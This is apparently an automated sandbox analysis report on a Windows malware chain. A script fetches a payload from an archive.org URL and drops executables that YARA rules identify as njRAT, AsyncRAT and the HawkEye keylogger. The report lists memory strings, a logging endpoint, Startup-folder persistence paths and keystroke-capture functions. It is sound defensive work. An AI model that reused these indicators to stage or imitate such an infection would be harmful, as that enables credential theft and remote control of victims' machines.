            Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comTTFd
            Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
            Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomF
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdG
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdi
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdita
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed8
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitu
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsief
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtua
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn)
            Source: tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/S
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnlw
            Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnm
            Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnu
            Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmQK
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/8
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/96
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/L
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0et
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/arge
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/het
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/i
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/3
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/udi
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/uild
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vno8
            Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/wab
            Source: tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co
            Source: tmpFB21.tmp.exe.2.drString found in binary or memory: http://www.nirsoft.net/
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
            Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
            Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmpString found in binary or memory: https://ia601504.us.archive.org/
            Source: wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmpString found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
            Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u
            Source: wscript.exe, 00000000.00000003.339656954.000001B863D52000.00000004.00000001.sdmpString found in binary or memory: https://ia601504.us.archive.org/25/iter
            Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmpString found in binary or memory: https://ia601504.us.archive.org/3
            Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
            Source: tmpFB21.tmp.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: tmpFB21.tmp.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https:/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownHTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
            Contains functionality to log keystrokes (.Net Source)Show sources
            Source: Tmp.exe.0.dr, kl.cs.Net Code: VKCodeToUnicode
            Source: servieda.exe.1.dr, kl.cs.Net Code: VKCodeToUnicode
            Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs.Net Code: VKCodeToUnicode
            Source: 2.2.pgr.exe.80000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: 2.0.pgr.exe.80000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs.Net Code: VKCodeToUnicode
            Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs.Net Code: VKCodeToUnicode
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,
            Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected NjratShow sources
            Source: Yara matchFile source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
